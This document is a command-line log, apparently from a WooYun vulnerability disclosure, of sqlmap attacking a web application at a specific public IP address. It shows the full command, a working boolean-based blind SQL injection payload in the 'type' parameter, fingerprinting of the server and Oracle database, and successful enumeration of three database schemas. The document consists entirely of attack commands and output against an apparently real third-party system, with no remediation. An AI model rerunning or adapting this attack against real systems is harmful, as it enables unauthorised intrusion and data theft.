WooYun.org

C:\Users\H-Kuuki>sqlmap.py -u "http://218.29.79.80/senior/policy/?type=02" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws. Developer
s assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:11:26
[21:11:26] [INFO] resuming back-end DBMS 'oracle'
[21:11:26] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: type
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=02' AND 6644=6644 AND 'GflB'='GflB
---
[21:11:27] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[21:11:27] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart
to database names on other DBMSes
[21:11:27] [INFO] fetching database (schema) names
[21:11:27] [INFO] fetching number of databases
[21:11:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' fo
r faster data retrieval
[21:11:27] [INFO] retrieved:
[21:11:28] [WARNING] reflective value(s) found and filtering out
3
[21:11:33] [INFO] retrieved: SEMIS
[21:12:10] [INFO] retrieved: SYS
[21:12:34] [INFO] retrieved: SYSTEM
available databases [3]:
[*] SEMIS
[*] SYS
[*] SYSTEM
[21:13:18] [INFO] fetched data logged to text files under 'D:\sqlmap\output\218.29.79.80'
[*] shutting down at 21:13:18